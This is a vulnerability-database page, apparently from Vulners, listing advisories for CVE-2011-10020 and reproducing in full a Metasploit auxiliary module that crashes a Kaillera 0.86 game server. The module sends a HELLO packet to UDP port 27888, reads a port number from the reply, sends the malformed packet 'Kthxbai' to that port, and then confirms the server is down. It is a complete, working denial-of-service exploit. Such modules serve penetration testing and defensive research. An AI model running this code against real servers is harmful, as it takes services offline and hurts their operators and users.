Lucene search
+L

Kaillera 0.86 Server Denial of Service

🗓️ 02 Jul 2011 00:00:00Reported by Sil3nt_Dre4mType 
metasploit
 metasploit
🔗 www.rapid7.com👁 22 Views

Kaillera 0.86 Server DoS by Malformed Packe

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2011-10020
20 Aug 202515:35
attackerkb
circl
Circl
CVE-2011-10020
29 May 201815:50
circl
cnnvd
CNNVD
Kaillera Server 安全漏洞
20 Aug 202500:00
cnnvd
cve
CVE
CVE-2011-10020
20 Aug 202515:35
cve
cvelist
Cvelist
CVE-2011-10020 Kaillera 0.86 Server DoS via Malformed UDP Packet
20 Aug 202515:35
cvelist
euvd
EUVD
EUVD-2011-5257
7 Oct 202500:30
euvd
nvd
NVD
CVE-2011-10020
20 Aug 202516:15
nvd
ptsecurity
Positive Technologies
PT-2025-34101 · Undefined · Undefined
20 Aug 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2011-10020
22 Aug 202516:35
redhatcve
vulnrichment
Vulnrichment
CVE-2011-10020 Kaillera 0.86 Server DoS via Malformed UDP Packet
20 Aug 202515:35
vulnrichment
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Kaillera 0.86 Server Denial of Service',
        'Description' => %q{
          The Kaillera 0.86 server can be shut down by sending any malformed packet
          after the initial "hello" packet.
        },
        'Author' => ['Sil3nt_Dre4m'],
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2011-07-02',
        'References' => [
          [ 'CVE', '2011-10020' ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options([
      Opt::RPORT(27888)
    ])
  end

  def run
    # Send HELLO to target
    connect_udp
    print_status('Sending Crash request...')
    udp_sock.put("HELLO0.83\0")
    res = udp_sock.timed_recvfrom(15) || ['']
    disconnect_udp

    if res[0] =~ /HELLOD00D([0-9]{1,5})/
      port = ::Regexp.last_match(1)
    else
      print_error('Connection failed')
      return
    end

    # Send DOS packet
    connect_udp(true, 'RPORT' => port)
    print_status("Sending DoS packet to #{rhost}:#{port}...")
    udp_sock.put('Kthxbai')
    disconnect_udp

    # Check is target is down
    connect_udp
    print_status('Checking target...')
    udp_sock.put("HELLO0.83\0")
    res = udp_sock.timed_recvfrom(15) || ['']
    disconnect_udp

    if res[0] =~ /HELLO/
      print_error('DoS attempt failed.  It appears target is still up.')
    else
      print_good('Target is down')
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jul 2011 00:00Current
5.3Medium risk
Vulners AI Score5.3
CVSS 48.7
EPSS0.00911
SSVC
22